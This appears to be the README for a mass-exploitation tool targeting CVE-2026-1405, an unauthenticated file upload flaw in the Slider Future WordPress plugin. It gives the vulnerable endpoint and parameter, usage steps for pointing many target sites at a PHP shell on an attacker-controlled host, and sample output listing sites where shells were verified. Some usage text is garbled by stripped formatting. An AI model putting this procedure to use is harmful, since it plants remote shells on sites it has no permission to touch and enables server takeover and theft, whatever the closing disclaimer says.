
Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
Component: Slider Future (WordPress plugin)
Affected Versions: ≤ 1.0.5
Vulnerability: Unauthenticated Arbitrary File Upload
CVE: CVE-2026-1405
CVSS Score: 9.8 (Critical)
The Slider Future plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the slider_future_handle_image_upload function in all versions up to and including 1.0.5. This allows unauthenticated attackers to upload any file type—including malicious PHP shells—directly to the affected server, enabling remote code execution.
/wp-json/slider-future/v1/upload-image/image_url parameter (no authentication required).http://example1.com
https://example2.com
...
Example: http://yourserver.com/shell.php
python3 CVE-2026-1405.py
You will be prompted for:
list.txt)Nxploited)success_results.txt./wp-json/slider-future/v1/upload-image/image_url pointing to your shell.This tool is for educational and authorized security testing purposes only.
Unauthorized use against sites you do not own or have explicit permission to test is illegal.
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt